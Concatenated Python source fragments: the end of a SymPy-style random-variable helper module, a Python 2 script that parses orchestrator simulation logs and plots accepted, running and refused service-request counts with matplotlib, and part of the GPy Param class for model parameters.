b_symbols = pspace(a).symbols
if len(a_symbols.intersect(b_symbols)) == 0:
return True
return None
def rv_subs(expr, symbols=None):
"""
Given a random expression replace all random variables with their symbols.
If symbols keyword is given restrict the swap to only the symbols listed.
"""
if symbols is None:
symbols = random_symbols(expr)
if not symbols:
return expr
swapdict = dict([(rv, rv.symbol) for rv in symbols])
return expr.xreplace(swapdict)
class NamedArgsMixin(object):
_argnames = ()
def __getattr__(self, attr):
try:
return self.args[self._argnames.index(attr)]
except ValueError:
raise AttributeError("'%s' object has not attribute '%s'" % (
type(self).__name__, attr))
def _value_check(condition, message):
"""
Check a condition on input value.
Raises ValueError with message if condition is not True
"""
if condition != True:
raise ValueError(message)
|
|
#!/usr/bin/python
import matplotlib.pyplot as plt
from matplotlib import *
import sys, getopt
import copy
import time
import datetime
import random
import sys
import os
import re
def get_data(file_list, type, start, finish, nice):
mapped_reqs, running_reqs, refused_reqs = [], [], []
mapped_requests_dict = dict()
mapped_requests_dict["request_list"] = []
mapped_requests_dict["incoming_time"] = []
mapped_requests_dict["name"] = ""
running_requests_dict = dict()
running_requests_dict["request_list"] = []
running_requests_dict["incoming_time"] = []
running_requests_dict["name"] = ""
refused_requests_dict = dict()
refused_requests_dict["request_list"] = []
refused_requests_dict["incoming_time"] = []
refused_requests_dict["name"] = ""
file_list_iter = 0
unfinished_test_count = False
for element in file_list:
start_time, data_point_count = 0, 0
name = ""
if isinstance(element, basestring) or len(element) == 1:
if not isinstance(element, basestring):
element = str(element[0])
for line in open(element):
if start_time == 0:
start_time = datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')
if "| Orchestrator:" in line:
name = line[line.find("| Orchestrator:")+15:]
if "| What to optimize:" in line:
name += "_" + line[line.find("| What to optimize:")+19:]
if "| When to optimize:" in line:
name += "_" + line[line.find("| When to optimize:")+19:]
if "| Optimize strategy:" in line:
name += "_" + line[line.find("| Optimize strategy:")+20:]
if "Mapped service_requests count:" in line:
data_point_count += 1
if start <= data_point_count <= finish:
if "Mapped service_requests count:" in line:
count = line[line.find("Mapped service_requests count:")+31:]
mapped_requests_dict["request_list"].append(int(count))
sec = ((datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
mapped_requests_dict["incoming_time"].append(sec)
elif "Running service_requests count:" in line:
count = line[line.find("Running service_requests count:")+32:]
running_requests_dict["request_list"].append(int(count))
sec = ((datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
running_requests_dict["incoming_time"].append(sec)
elif "Refused service_requests count:" in line:
count = line[line.find("Refused service_requests count:")+32:]
refused_requests_dict["request_list"].append(int(count))
sec = ((datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
refused_requests_dict["incoming_time"].append(sec)
mapped_requests_dict["name"] = (name+"_"+str(file_list[file_list_iter])).replace("\n", "")
mapped_reqs.append(copy.copy(mapped_requests_dict))
mapped_requests_dict["name"] = ""
mapped_requests_dict["request_list"] = []
mapped_requests_dict["incoming_time"] = []
running_requests_dict["name"] = (name+"_"+str(file_list[file_list_iter])).replace("\n", "")
running_reqs.append(copy.copy(running_requests_dict))
running_requests_dict["name"] = ""
running_requests_dict["request_list"] = []
running_requests_dict["incoming_time"] = []
refused_requests_dict["name"] = (name+"_"+str(file_list[file_list_iter])).replace("\n", "")
refused_reqs.append(copy.copy(refused_requests_dict))
refused_requests_dict["name"] = ""
refused_requests_dict["request_list"] = []
refused_requests_dict["incoming_time"] = []
else:
start_time, data_point_count = 0, 0
name = ""
mapped_reqs_to_avg, running_reqs_to_avg, refused_reqs_to_avg = [], [], []
for file in element:
mapped_requests_dict["name"] = ""
mapped_requests_dict["request_list"] = []
mapped_requests_dict["incoming_time"] = []
running_requests_dict["name"] = ""
running_requests_dict["request_list"] = []
running_requests_dict["incoming_time"] = []
refused_requests_dict["name"] = ""
refused_requests_dict["request_list"] = []
refused_requests_dict["incoming_time"] = []
data_point_count = 0
for line in open(file):
if start_time == 0:
start_time = datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')
if "| Orchestrator:" in line:
name = line[line.find("| Orchestrator:") + 15:]
if "| What to optimize:" in line:
name += "_" + line[line.find("| What to optimize:") + 19:]
if "| When to optimize:" in line:
name += "_" + line[line.find("| When to optimize:") + 19:]
if "| Optimize strategy:" in line:
name += "_" + line[line.find("| Optimize strategy:") + 20:]
if "Mapped service_requests count:" in line:
data_point_count += 1
if start <= data_point_count <= finish:
if "Mapped service_requests count:" in line:
count = line[line.find("Mapped service_requests count:") + 31:]
mapped_requests_dict["request_list"].append(int(count))
sec = ((datetime.datetime.strptime(line[:22],
'%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
mapped_requests_dict["incoming_time"].append(sec)
elif "Running service_requests count:" in line:
count = line[line.find("Running service_requests count:") + 32:]
running_requests_dict["request_list"].append(int(count))
sec = ((datetime.datetime.strptime(line[:22],
'%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
running_requests_dict["incoming_time"].append(sec)
elif "Refused service_requests count:" in line:
count = line[line.find("Refused service_requests count:") + 32:]
refused_requests_dict["request_list"].append(int(count))
sec = ((datetime.datetime.strptime(line[:22],
'%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
refused_requests_dict["incoming_time"].append(sec)
mapped_requests_dict["name"] = (name + "_AVG_" + str(file_list[file_list_iter])).replace("\n", "")
mapped_reqs_to_avg.append(copy.copy(mapped_requests_dict))
running_requests_dict["name"] = (name + "_AVG_" + str(file_list[file_list_iter])).replace("\n", "")
running_reqs_to_avg.append(copy.copy(running_requests_dict))
refused_requests_dict["name"] = (name + "_AVG_" + str(file_list[file_list_iter])).replace("\n", "")
refused_reqs_to_avg.append(copy.copy(refused_requests_dict))
mapped_requests_dict["name"] = ""
mapped_requests_dict["request_list"] = []
mapped_requests_dict["incoming_time"] = []
running_requests_dict["name"] = ""
running_requests_dict["request_list"] = []
running_requests_dict["incoming_time"] = []
refused_requests_dict["name"] = ""
refused_requests_dict["request_list"] = []
refused_requests_dict["incoming_time"] = []
# Get the longest list len
longest_list = len(mapped_reqs_to_avg[0]["request_list"])
for x in range(0, len(mapped_reqs_to_avg)):
if len(mapped_reqs_to_avg[x]["request_list"]) > longest_list:
longest_list = len(mapped_reqs_to_avg[x]["request_list"])
# Average dicts
avg_mapped_requests_dict = dict()
avg_mapped_requests_dict["request_list"] = []
avg_mapped_requests_dict["incoming_time"] = []
avg_mapped_requests_dict["name"] = ""
avg_running_requests_dict = dict()
avg_running_requests_dict["request_list"] = []
avg_running_requests_dict["incoming_time"] = []
avg_running_requests_dict["name"] = ""
avg_refused_requests_dict = dict()
avg_refused_requests_dict["request_list"] = []
avg_refused_requests_dict["incoming_time"] = []
avg_refused_requests_dict["name"] = ""
inc_summa, req_summa, log_file_counter = 0, 0, 0
for i in range(0, longest_list):
for m in mapped_reqs_to_avg:
try:
inc_summa += m["incoming_time"][i]
req_summa += m["request_list"][i]
log_file_counter += 1
except:
unfinished_test_count = True
# in this case, the current test is shorter than the others
pass
avg_mapped_requests_dict["incoming_time"].append(round(inc_summa / log_file_counter, 2))
avg_mapped_requests_dict["request_list"].append(int(req_summa / log_file_counter))
avg_mapped_requests_dict["name"] = mapped_reqs_to_avg[0]["name"]
inc_summa, req_summa, log_file_counter = 0, 0, 0
for i in range(0, longest_list):
for m in running_reqs_to_avg:
try:
inc_summa += m["incoming_time"][i]
req_summa += m["request_list"][i]
log_file_counter += 1
except:
# in this case, the current test is shorter than the others
pass
avg_running_requests_dict["incoming_time"].append(round(inc_summa / log_file_counter, 2))
avg_running_requests_dict["request_list"].append(int(req_summa / log_file_counter))
avg_running_requests_dict["name"] = running_reqs_to_avg[0]["name"]
inc_summa, req_summa, log_file_counter = 0, 0, 0
for i in range(0, longest_list):
for m in refused_reqs_to_avg:
try:
inc_summa += m["incoming_time"][i]
req_summa += m["request_list"][i]
log_file_counter += 1
except:
# in this case, the current test is shorter than the others
pass
avg_refused_requests_dict["incoming_time"].append(round(inc_summa / log_file_counter, 2))
avg_refused_requests_dict["request_list"].append(int(req_summa / log_file_counter))
avg_refused_requests_dict["name"] = refused_reqs_to_avg[0]["name"]
inc_summa, req_summa, log_file_counter = 0, 0, 0
mapped_reqs.append(copy.copy(avg_mapped_requests_dict))
running_reqs.append(copy.copy(avg_running_requests_dict))
refused_reqs.append(copy.copy(avg_refused_requests_dict))
file_list_iter += 1
if unfinished_test_count:
print ('\x1b[1;33;0m' + 'There are one or more unfinished tests!!!' + '\x1b[0m')
return mapped_reqs, running_reqs, refused_reqs
def separate_and_avg(log_files):
# Separate
try:
result = []
if "[" in log_files:
avg_log_files = log_files.split(",")
# where are [ and ] characters:
start = [i for i, s in enumerate(avg_log_files) if '[' in s]
end = [i for i, s in enumerate(avg_log_files) if ']' in s]
if len(start) != len(end):
print("The number of [ and ] is not equal!!")
raise
# delete special characters:
avg_log_files = ([s.replace('[', '') for s in avg_log_files])
avg_log_files = ([s.replace(']', '') for s in avg_log_files])
# merge those items in the list that were in the same parentheses
correction = 0
for k in range(0, len(start)):
avg_log_files[(start[k]-correction):(end[k]+1-correction)] = \
[','.join(avg_log_files[(start[k]-correction):(end[k]+1-correction)])]
correction += end[k] - start[k]
for element in avg_log_files:
while "." in element:
tmp_element = []
element = element.split(",")
for i in element:
if i!='':
tmp_element.append(i)
element = tmp_element
result.append(element)
print "result::"
for x in result:
print x
return result
else:
return log_files.split(",")
except Exception as e:
print e
print "Separate file error!"
def main(argv):
mapped_online_req_list = None
mapped_offline_req_list = None
mapped_hybrid_req_list = None
running_online_req_list = None
running_offline_req_list = None
running_hybrid_req_list = None
refused_online_req_list = None
refused_offline_req_list = None
refused_hybrid_req_list = None
start_count = 0
finish_count = float('inf')
path = ""
nice, nolegend = False, False
format = "png"
mark_every = 50
marker_size = 4
try:
opts, args = getopt.getopt(argv, "hs:f:", ["online_log_files=", "offline_log_files=", "hybrid_log_files=",
"dir=", "nice", "format=", "nolegend", "markersize=",
"markevery=", "s=", "f="])
except getopt.GetoptError:
print 'Invalid argument!!! create_plots.py ' \
'--online_log_files=<online_log_file1,[online_log_file2,online_log_file3],' \
'online_log_file4 ...> --offline_log_files=<offline_log_file1,offline_log_file2,...> ' \
'--hybrid_log_files=<hybrid_log_file1,hybrid_log_file2,...> ' \
'--dir=<directory name> --s=<start of interval> --f=<end of interval> --nice --format=<pdf or png> ' \
'--nolegend --markersize=<recommended:5> --markevery=<recommended:40-70>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'create_plots.py ' \
'--online_log_files=<online_log_file1,[online_log_file2,online_log_file3],' \
'online_log_file4 ...> --offline_log_files=<offline_log_file1,offline_log_file2,...> ' \
'--hybrid_log_files=<hybrid_log_file1,hybrid_log_file2,...> ' \
'--dir=<directory name> --s=<start of interval> --f=<end of interval> --nice --format=<pdf or png> ' \
'--nolegend --markersize=<recommended:5> --markevery=<recommended:40-70>'
sys.exit()
elif opt in ("--online_log_files="):
online_log_files = arg
elif opt in ("--offline_log_files="):
offline_log_files = arg
elif opt in ("--hybrid_log_files="):
hybrid_log_files = arg
elif opt in ("--dir="):
path = arg
elif opt in ("--s="):
start_count = int(arg)
elif opt in ("--f="):
finish_count = int(arg)
elif opt in ("--nice"):
nice = True
elif opt in ("--nolegend"):
nolegend = True
elif opt in ("--format="):
if arg == "pdf" or arg == "png":
format = arg
else:
print 'Invalid format! Only pdf or png!'
sys.exit()
elif opt in ("--markersize="):
marker_size = int(arg)
elif opt in ("--markevery="):
mark_every = int(arg)
else:
print 'Bad parameters! Use python create_plots.py --help'
sys.exit()
print "argument:::::"
print (sys.argv)
print "arg0" + sys.argv[0]
print "arg1" + sys.argv[1]
print "arg2" + sys.argv[2]
try:
online_files = separate_and_avg(online_log_files)
mapped_online_req_list, running_online_req_list, refused_online_req_list = \
get_data(online_files, "Online", start_count, finish_count, nice)
except Exception as e:
print e
print "The program runs without online log file."
try:
offline_files = separate_and_avg(offline_log_files)
mapped_offline_req_list, running_offline_req_list, refused_offline_req_list = \
get_data(offline_files, "Offline", start_count, finish_count, nice)
except Exception as e:
print e
print "The program runs without offline log file."
try:
hybrid_files = separate_and_avg(hybrid_log_files)
mapped_hybrid_req_list, running_hybrid_req_list, refused_hybrid_req_list = \
get_data(hybrid_files, "Hybrid", start_count, finish_count, nice)
except Exception as e:
print e
print "The program runs without hybrid log file."
if path == "":
raise ValueError("Have to give a saving directory! Example: --dir=test100")
if not os.path.exists(path):
os.mkdir(path)
if path[:-1] != "/":
path = path + "/"
colors_ls = ['red', 'blue', 'green', 'yellow', 'skyblue', 'yellowgreen', 'black', 'orange', 'magenta', 'slategray']
lines_ls = [[8, 4, 2, 4, 2, 4], [4, 2], [], [8, 4, 4, 2], [8, 4, 2, 4], [5, 2, 10, 5], []]
markers_ls = ['o', 'v', '+', 's', '*', '', '|', 'x']
colors_iter = iter(['red', 'blue', 'green', 'yellow', 'skyblue', 'yellowgreen', 'black', 'orange', 'magenta', 'slategray'])
lines_iter = iter([[8, 4, 2, 4, 2, 4], [4, 2], [], [8, 4, 4, 2], [8, 4, 2, 4], [5, 2, 10, 5], []])
markers_iter = iter(['o', 'v', '+', 's', '*', '', '|', 'x'])
on_act_colors, on_act_lines, on_act_marker, off_act_colors, off_act_lines, off_act_marker, hy_act_colors, \
hy_act_lines, hy_act_marker = [], [], [], [], [], [], [], [], []
# Create mapped picture
if mapped_online_req_list is not None:
for element in mapped_online_req_list:
try:
color = colors_iter.next()
except:
color = random.choice(colors_ls)
try:
line = lines_iter.next()
except:
line = random.choice(lines_ls)
try:
marker = markers_iter.next()
except:
marker = random.choice(markers_ls)
finally:
on_act_marker.append(marker)
on_act_colors.append(color)
on_act_lines.append(line)
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
if mapped_offline_req_list is not None:
for element in mapped_offline_req_list:
try:
color = colors_iter.next()
except:
color = random.choice(colors_ls)
try:
line = lines_iter.next()
except:
line = random.choice(lines_ls)
try:
marker = markers_iter.next()
except:
marker = random.choice(markers_ls)
finally:
off_act_marker.append(marker)
off_act_colors.append(color)
off_act_lines.append(line)
label = element["name"].replace('/', '_').replace('-', '_').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
if mapped_hybrid_req_list is not None:
for element in mapped_hybrid_req_list:
try:
color = colors_iter.next()
except:
color = random.choice(colors_ls)
try:
line = lines_iter.next()
except:
line = random.choice(lines_ls)
try:
marker = markers_iter.next()
except:
marker = random.choice(markers_ls)
finally:
hy_act_marker.append(marker)
hy_act_colors.append(color)
hy_act_lines.append(line)
label = element["name"].replace('/', '_').replace('-', '_').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
plt.grid('on')
plt.title('Accepted incoming service requests')
plt.ylabel('Accepted requests count')
plt.xlabel('Incoming requests')
plt.xticks()
if start_count != 0 or finish_count != float('inf'):
plt.xlim(xmin=start_count, xmax=finish_count)
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if nolegend:
plt.legend().set_visible(False)
plt.savefig(path + "mapped_requests" + str(time.ctime()).replace(' ', '_').replace(':', '-') + "." + format,
bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create mapped picture with time axis
if mapped_online_req_list is not None:
i = 0
for element in mapped_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if mapped_offline_req_list is not None:
i = 0
for element in mapped_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if mapped_hybrid_req_list is not None:
i = 0
for element in mapped_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Accepted incoming service requests')
plt.ylabel('Accepted requests count')
plt.xlabel('Sec')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
#TODO: fix zoom with time axis too
if nolegend:
plt.legend().set_visible(False)
plt.savefig(path + "mapped_requests_with_time_axis_" +
str(time.ctime()).replace(' ', '_').replace(':', '-') + "." + format,
bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create Running picture
if running_online_req_list is not None:
i = 0
for element in running_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if running_offline_req_list is not None:
i = 0
for element in running_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if running_hybrid_req_list is not None:
i = 0
for element in running_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Currently running (mapped) requests in the NFFG')
plt.ylabel('Requests count')
plt.xlabel('Incoming requests')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if start_count != 0 or finish_count != float('inf'):
plt.xlim(xmin=start_count, xmax=finish_count)
if nolegend:
plt.legend().set_visible(False)
plt.savefig(path + "running_requests" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create Running picture with time axis
if running_online_req_list is not None:
i = 0
for element in running_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80],
dashes=line, marker=marker, markersize=marker_size, markevery=mark_every)
i += 1
if running_offline_req_list is not None:
i = 0
for element in running_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if running_hybrid_req_list is not None:
i = 0
for element in running_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Currently running (mapped) requests in the NFFG')
plt.ylabel('Requests count')
plt.xlabel('Sec')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if nolegend:
plt.legend().set_visible(False)
# TODO: fix zoom with time axis too
plt.savefig(path + "running_requests_with_time_axis" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create refused picture
if refused_online_req_list is not None:
i = 0
for element in refused_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_offline_req_list is not None:
i = 0
for element in refused_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_hybrid_req_list is not None:
i = 0
for element in refused_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.title('Refused requests during the simulation')
plt.ylabel('Refused requests count')
plt.xlabel('Incoming requests')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if start_count != 0 or finish_count != float('inf'):
plt.xlim(xmin=start_count, xmax=finish_count)
if nolegend:
plt.legend().set_visible(False)
plt.grid('on')
plt.savefig(path + "refused_requests" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create refused picture with time
if refused_online_req_list is not None:
i = 0
for element in refused_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_offline_req_list is not None:
i = 0
for element in refused_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_hybrid_req_list is not None:
i = 0
for element in refused_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Refused requests during the simulation')
plt.ylabel('Refused requests count')
plt.xlabel('Sec')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if nolegend:
plt.legend().set_visible(False)
# TODO: fix zoom with time axis too
plt.savefig(path + "refused_requests_with_time_axis" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
print('\x1b[1;32;0m' + 'Creating plots are DONE :)' + '\x1b[0m')
if __name__ == "__main__":
main(sys.argv[1:])
|
|
# Copyright (c) 2014, Max Zwiessele
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import itertools
import numpy
np = numpy
from parameter_core import Parameterizable, adjust_name_for_printing, Pickleable
from observable_array import ObsAr
###### printing
__constraints_name__ = "Constraint"
__index_name__ = "Index"
__tie_name__ = "Tied to"
__priors_name__ = "Prior"
__precision__ = numpy.get_printoptions()['precision'] # numpy printing precision used, sublassing numpy ndarray after all
__print_threshold__ = 5
######
class Param(Parameterizable, ObsAr):
"""
Parameter object for GPy models.
:param str name: name of the parameter to be printed
:param input_array: array which this parameter handles
:type input_array: numpy.ndarray
:param default_constraint: The default constraint for this parameter
:type default_constraint:
You can add/remove constraints by calling constrain on the parameter itself, e.g:
- self[:,1].constrain_positive()
- self[0].tie_to(other)
- self.untie()
- self[:3,:].unconstrain()
- self[1].fix()
Fixing parameters will fix them to the value they are right now. If you change
the fixed value, it will be fixed to the new value!
See :py:class:`GPy.core.parameterized.Parameterized` for more details on constraining etc.
"""
__array_priority__ = -1 # Never give back Param
_fixes_ = None
parameters = []
def __new__(cls, name, input_array, default_constraint=None):
obj = numpy.atleast_1d(super(Param, cls).__new__(cls, input_array=input_array))
obj._current_slice_ = (slice(obj.shape[0]),)
obj._realshape_ = obj.shape
obj._realsize_ = obj.size
obj._realndim_ = obj.ndim
obj._original_ = obj
return obj
def __init__(self, name, input_array, default_constraint=None, *a, **kw):
self._in_init_ = True
super(Param, self).__init__(name=name, default_constraint=default_constraint, *a, **kw)
self._in_init_ = False
def build_pydot(self,G):
import pydot
node = pydot.Node(id(self), shape='trapezium', label=self.name)#, fontcolor='white', color='white')
G.add_node(node)
for _, o, _ in self.observers:
label = o.name if hasattr(o, 'name') else str(o)
observed_node = pydot.Node(id(o), label=label)
G.add_node(observed_node)
edge = pydot.Edge(str(id(self)), str(id(o)), color='darkorange2', arrowhead='vee')
G.add_edge(edge)
return node
def __array_finalize__(self, obj):
# see InfoArray.__array_finalize__ for comments
if obj is None: return
super(Param, self).__array_finalize__(obj)
self._parent_ = getattr(obj, '_parent_', None)
self._parent_index_ = getattr(obj, '_parent_index_', None)
self._default_constraint_ = getattr(obj, '_default_constraint_', None)
self._current_slice_ = getattr(obj, '_current_slice_', None)
self._realshape_ = getattr(obj, '_realshape_', None)
self._realsize_ = getattr(obj, '_realsize_', None)
self._realndim_ = getattr(obj, '_realndim_', None)
self._original_ = getattr(obj, '_original_', None)
self._name = getattr(obj, '_name', None)
self._gradient_array_ = getattr(obj, '_gradient_array_', None)
self.constraints = getattr(obj, 'constraints', None)
self.priors = getattr(obj, 'priors', None)
@property
def param_array(self):
"""
As we are a leaf, this just returns self
"""
return self
@property
def values(self):
"""
Return self as numpy array view
"""
return self.view(np.ndarray)
@property
def gradient(self):
"""
Return a view on the gradient, which is in the same shape as this parameter is.
Note: this is not the real gradient array, it is just a view on it.
To work on the real gradient array use: self.full_gradient
"""
if getattr(self, '_gradient_array_', None) is None:
self._gradient_array_ = numpy.empty(self._realshape_, dtype=numpy.float64)
return self._gradient_array_#[self._current_slice_]
@gradient.setter
def gradient(self, val):
self._gradient_array_[:] = val
#===========================================================================
# Array operations -> done
#===========================================================================
def __getitem__(self, s, *args, **kwargs):
if not isinstance(s, tuple):
s = (s,)
#if not reduce(lambda a, b: a or numpy.any(b is Ellipsis), s, False) and len(s) <= self.ndim:
# s += (Ellipsis,)
new_arr = super(Param, self).__getitem__(s, *args, **kwargs)
try:
new_arr._current_slice_ = s
new_arr._gradient_array_ = self.gradient[s]
new_arr._original_ = self._original_
except AttributeError: pass # returning 0d array or float, double etc
return new_arr
def _raveled_index(self, slice_index=None):
# return an index array on the raveled array, which is formed by the current_slice
# of this object
extended_realshape = numpy.cumprod((1,) + self._realshape_[:0:-1])[::-1]
ind = self._indices(slice_index)
if ind.ndim < 2: ind = ind[:, None]
return numpy.asarray(numpy.apply_along_axis(lambda x: numpy.sum(extended_realshape * x), 1, ind), dtype=int)
def _raveled_index_for(self, obj):
return self._raveled_index()
#===========================================================================
# Constrainable
#===========================================================================
def _ensure_fixes(self):
if not self._has_fixes(): self._fixes_ = numpy.ones(self._realsize_, dtype=bool)
#===========================================================================
# Convenience
#===========================================================================
@property
def is_fixed(self):
from transformations import __fixed__
return self.constraints[__fixed__].size == self.size
def _get_original(self, param):
return self._original_
#===========================================================================
# Pickling and copying
#===========================================================================
def copy(self):
return Parameterizable.copy(self, which=self)
def __deepcopy__(self, memo):
s = self.__new__(self.__class__, name=self.name, input_array=self.view(numpy.ndarray).copy())
memo[id(self)] = s
import copy
Pickleable.__setstate__(s, copy.deepcopy(self.__getstate__(), memo))
return s
def _setup_observers(self):
"""
Setup the default observers
1: pass through to parent, if present
"""
if self.has_parent():
self.add_observer(self._parent_, self._parent_._pass_through_notify_observers, -np.inf)
#===========================================================================
# Printing -> done
#===========================================================================
@property
def _description_str(self):
if self.size <= 1:
return [str(self.view(numpy.ndarray)[0])]
else: return [str(self.shape)]
def parameter_names(self, add_self=False, adjust_for_printing=False, recursive=True):
# this is just overwrighting the parameterized calls to parameter names, in order to maintain OOP
if adjust_for_printing:
return [adjust_name_for_printing(self.name)]
return [self.name]
@property
def flattened_parameters(self):
return [self]
@property
def parameter_shapes(self):
return [self.shape]
@property
def num_params(self):
return 0
@property
def _constraints_str(self):
return [' '.join(map(lambda c: str(c[0]) if c[1].size == self._realsize_ else "{" + str(c[0]) + "}", self.constraints.iteritems()))]
@property
def _priors_str(self):
return [' '.join(map(lambda c: str(c[0]) if c[1].size == self._realsize_ else "{" + str(c[0]) + "}", self.priors.iteritems()))]
@property
def _ties_str(self):
return ['']
def _ties_for(self, ravi):
return [['N/A']]*ravi.size
def __repr__(self, *args, **kwargs):
name = "\033[1m{x:s}\033[0;0m:\n".format(
x=self.hierarchy_name())
return name + super(Param, self).__repr__(*args, **kwargs)
def _indices(self, slice_index=None):
# get a int-array containing all indices in the first axis.
if slice_index is None:
slice_index = self._current_slice_
try:
indices = np.indices(self._realshape_, dtype=int)
indices = indices[(slice(None),)+slice_index]
indices = np.rollaxis(indices, 0, indices.ndim).reshape(-1,self._realndim_)
#print indices_
#if not np.all(indices==indices__):
# import ipdb; ipdb.set_trace()
except:
